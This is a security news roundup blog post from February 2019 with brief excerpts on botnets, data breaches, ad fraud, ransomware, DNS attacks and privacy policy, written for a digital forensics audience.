AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

Blog Post

InfoSec News Nuggets – February 25, 2019

1 A third of all Chrome extensions request access to user data on any site

The same survey also found that roughly 85 percent of the 120,000 Chrome extensions listed on the Chrome Web Store don't have a privacy policy listed, meaning there's no legally-binding document describing how extension developers are committing to handling user data. Additional survey findings include the fact that 77 percent of the tested Chrome extensions didn't list a support site, 32 percent used third-party JavaScript libraries that contained publicly known vulnerabilities, and nine percent could access and read cookie files, some of which are used for authentication operations. This gigantic survey was carried out last month by the research team from US cyber-security firm Duo Labs with the help of a new web service they developed and called CRXcavator.


2 IoT botnets target enterprise video conferencing systems

In August, researchers from IoT security startup WootCloud discovered a botnet dubbed OMNI that was infecting business video conferencing systems made by Polycom. Since then, the company has seen three additional botnets targeting the same type of systems in addition to other Linux-based embedded devices. The three new botnets that target Polycom HDX series endpoints are called Bushido, Hades and Yowai and are based on the Mirai botnet whose source code was leaked in 2016. Mirai successfully infected hundreds of thousands of IoT devices and was used to launch some of the largest distributed denial-of-service (DDoS) attacks in history. It spread primarily via Telnet connections in a worm-like manner by taking advantage of the fact that many users don't change the default administrative credentials on their smart devices.


3 Misconfigured database exposes 974,000 University of Washington Medicine patients

Almost one million University of Washington (UW) Medicine personal health information files were exposed for most of December 2018 due to a misconfigured database. The healthcare facility reported a website server was searchable on the internet from December 4-26 containing the data on 974,000 patients. UW said the delay in reporting the data breach was due to the time it took to conduct the initial investigation. The files contained patient names, medical record number, with whom UW Medicine shared the information, a description of what information was shared (For example, “demographics”, “office visits” or “labs”) and the reason for the disclosure, such as mandatory reporting or screening to see if you qualified for a research study, UW said. In some cases, the files included the name of a lab test that was performed (but not the result) or the name of the research study that included the name of a health condition.


4 Mark Zuckerberg says Facebook has been an 'innovator in privacy'

In a discussion with Harvard law professor Jonathan Zittrain, Zuckerberg said that Facebook has been a developer of cutting-edge private communication tools since the service's early days at Harvard, and that the company continues to focus on improving them. "Thinking about Facebook as an innovator in privacy is certainly not the mainstream view," Zuckerberg said during the taped conversation, which was released publicly on Wednesday. "But going back to the very first thing that we did, making it so Harvard students could communicate in a way that they had some confidence that their content and information would be shared with only people within that community, there was no way that people had to communicate stuff at that scale but not have it either be just completely public or just as small as it had been before."


5 Major ad scam 'DrainerBot' is rinsing Android users of their battery life and data

A major ad fraud operation could be sucking your phone of juice and using up more than 10GB of data a month by downloading hidden vids, Oracle has claimed. The database vendor has dubbed the dodgy data slurper DrainerBot, and said it uses infected code on Android devices to deliver fraudulent, invisible video ads. Infected apps consume "significant bandwidth and battery", Big Red said. The discovery was made by teams in two of Oracle's fairly recent acquisitions – ad-tracking biz Moat and internet infrastructure outfit Dyn – after they spotted significant increases in browsing activity from Android apps.


6 Cybercrime Groups Promising $360,000 Annual Salaries to Accomplices Helping to Extort High Net Worth Individuals

Digital Shadows, the leader in Digital Risk Protection, has today published new research looking at the business of cyber extortion. Entitled ‘A Tale of Epic Extortions’ it reveals that criminal groups are promising salaries averaging the equivalent of $360,000 per year to accomplices who can help them target high-worth individuals, such as company executives, lawyers and doctors with extortion scams. These salary promises can be higher still for those with network management, penetration testing and programming skills – with one threat actor willing to pay the equivalent of $768,000 per year, with add-ons and a final salary after the second year of $1,080,000 per year.


7 As fallout over pedophilia content on YouTube continues, AT&T and Hasbro pull all advertisements

AT&T and Hasbro are the latest companies to pull its ads from Google's YouTube following reports that pedophiles have latched onto videos of young children, often girls, marking time stamps that show child nudity and objectifying the children in YouTube's comments section. "Until Google can protect our brand from offensive content of any kind, we are removing all advertising from YouTube," an AT&T spokesperson told CNBC. The company originally pulled its entire ad spend from YouTube in 2017 after revelations that its ads were appearing alongside offensive content, including terrorist content, but resumed advertising in January.


8 Ransomware out, formjacking in as primary attack vectors

Quick and easy attack methods like formjacking gained popularity among cybercriminals last year, while more tried and true approaches like ransomware fell to the wayside in 2018, according to a new report. The reasoning behind this switch, according to Symantec’s just-released Internet Security Threat Report, is quite straight-forward. Formjacking, which entails placing malware on a victim’s system to steal payment card information, is simple to perform and offers an incredibly high yield. Symantec’s research revealed that on average a stolen payment card can be sold on the dark web for about $45 and with 4,800 sites being compromised each month even if only a small number of cards can be stolen from each incident the money quickly piles up for the thieves.


9 California to close data breach notification loopholes under new law

California, which has some of the strongest data breach notification laws in the U.S., thinks it can do even better. The golden state’s attorney general Xavier Becerra announced a new bill Thursday that aims to close loopholes in its existing data breach notification laws by expanding the requirements for companies to notify users or customers if their passport and government ID numbers, along with biometric data, such as fingerprints, and iris and facial recognition scans, have been stolen. The updated draft legislation lands a few months after the Starwood hack, which Becerra and Democratic state assembly member Marc Levine, who introduced the bill, said prompted the law change.


10 Google: Software is never going to be able to fix Spectre-type bugs

Researchers from Google investigating the scope and impact of the Spectre attack have published a paper asserting that Spectre-like vulnerabilities are likely to be a continued feature of processors and, further, that software-based techniques for protecting against them will both impose a high performance cost. In any case, the researchers continue, the software will be inadequate—some Spectre flaws don't appear to have any effective software-based defense. As such, Spectre is going to be a continued feature of the computing landscape, with no straightforward resolution.


11 No, Airlines Aren't Watching You With Cameras (Yet)

“Cameras are a standard feature on many in-flight entertainment systems used by multiple airlines,” Feinstein told Lifehacker. “Manufacturers of those systems have included cameras for possible future uses such as seat-to-seat video conferencing. While these cameras are present on some American Airlines in-flight entertainment systems as delivered from the manufacturer, they have never been activated and American is not considering using them.” In other words, it’s the manufacturers’ fault for installing cameras that American Airlines and other airlines had no intention of ever using, but purchased anyway.


12 Intel’s neuro guru slams deep learning: ‘it’s not actually learning’

"Backpropogation doesn't correlate to the brain," insists Mike Davies, head of Intel's neuromorphic computing unit, dismissing one of the key tools of the species of A.I. In vogue today, deep learning. "For that reason, "it's really an optimizations procedure, it's not actually learning." Davies made the comment during a talk on Thursday at the International Solid State Circuits Conference in San Francisco, a prestigious annual gathering of semiconductor designers. Davies was returning fire after Facebook's Yann LeCun, a leading apostle of deep learning, earlier in the week dismissed Davies's own technology during LeCun's opening keynote for the conference. 


13 ICANN warns of “ongoing and significant” attacks against internet’s DNS infrastructure

The internet’s address book keeper has warned of an “ongoing and significant risk” to key parts of the domain name system infrastructure, following months of increased attacks. The Internet Corporation for Assigned Names and Numbers, or ICANN, issued the notice late Friday, saying DNS, which converts numerical internet addresses to domain names, has been the victim of “multifaceted attacks utilizing different methodologies.” It follows similar warnings from security companies and the federal government in the wake of attacks believe to be orchestrated by nation state hackers.


14 Microsoft hails revamped goggles as more immersive and easy to wear

Microsoft unveiled the latest version of its HoloLens augmented reality headset on Sunday, promising wearers would feel more immersed in the augmented reality experience and more comfortable. Slipping on the carbon fiber goggles is as “simple as putting on your favorite hat”, Microsoft developer Alex Kipman told a launch event at the mobile industry’s biggest trade fair in Barcelona. Augmented reality devices overlay images as holograms on to a user’s real-life field of vision, aiming to improve efficiency at businesses ranging from doctors’ offices to factory floors. Microsoft showed off how the HoloLens 2 can track eye movements, and allow wearers to feel as though they can touch and manipulate holograms – playing a hologram piano and changing the speeds on a hologram windfarm installation.


15 LinkedIn Messaging Abused to Target US Companies With Backdoors

A series of malware campaigns that push the More_eggs backdoor via fake jobs offers are targeting employees of US companies which use shopping portals and similar online payment systems. The final payload used in this phishing campaign is always the JavaScript-based backdoor known as More_eggs, a malware strain designed to allow the attackers to control the compromised machines remotely and to enable them to drop extra malware payloads on their victims' computers. More_eggs was initially identified by Trend Micro during the summer of 2017 and, since then, it was used in multiple malicious e-mail campaigns, targeting Eastern European financial institutions or manufacturers of ATMs and other payment systems.


16 Federal Judge Throws Out Washington State Cyberstalking Law, Writing It Criminalizes Protected Speech

A federal judge in Washington has thrown out the state’s 2004 law prohibiting cyberstalking after finding that its barriers against speech that is intended to “harass, intimidate, torment, or embarrass” were too vague and violated the Constitution, per the Electronic Frontier Foundation. In his ruling, United States District Judge Ronald Bruce Leighton wrote that the law’s “breadth—by the plain meaning of its words—includes protected speech that is not exempted from protection by any of the recognized areas just described,” as well as that it “criminalizes a large range of non-obscene, non-threatening speech, based only on (1) purportedly bad intent and (2) repetition or anonymity.”


17 Payroll Provider Gives Extortionists a Payday

Payroll software provider Apex Human Capital Management suffered a ransomware attack this week that severed payroll management services for hundreds of the company’s customers for nearly three days. Faced with the threat of an extended outage, Apex chose to pay the ransom demand and begin the process of restoring service to customers. Roswell, Ga. based Apex HCM is a cloud-based payroll software company that serves some 350 payroll service bureaus that in turn provide payroll services to small and mid-sized businesses. At 4 a.m. on Tuesday, Feb. 19, Apex was alerted that its systems had been infected with a destructive strain of ransomware that encrypts computer files and demands payment for a digital key needed to unscramble the data.


18 Telephone Scams: Your Credit Card was Used in Fraudulent Activities

Everyone by now should have heard about the telephone scams involving a caller who claims that they are from the CRA (Canada Revenue Agency) or the IRS (Internal Revenue Service). These tax agency scams generally receive the most coverage, but some don’t get much attention. Recently, people have also received calls from individuals claiming to be from their “bank” that inform the receiver how their credit card was used in fraudulent activities. A person receives a call from an individual who claims they are an employee at their “bank.” The individual then notifies the receiver that their credit card has been used in fraudulent activities.


19 Prosecutors recommend prison sentence in 'celebgate' hacking case

Federal prosecutors have recommended a sentence of nearly three years in prison for a former Virginia high school teacher convicted of hacking into private digital accounts of celebrities and others. Christopher Brannan pleaded guilty in October to aggravated identity theft and unauthorized access to a protected computer. He was the fifth person charged in the 2014 "celebgate" scandal in which hackers obtained nude photographs and other private information from more than 200 people. Actresses Jennifer Lawrence and Mary Elizabeth Winstead are among the celebrities who said they were victims. Brannon is a former teacher at Lee-Davis High School in Mechanicsville.

Related Posts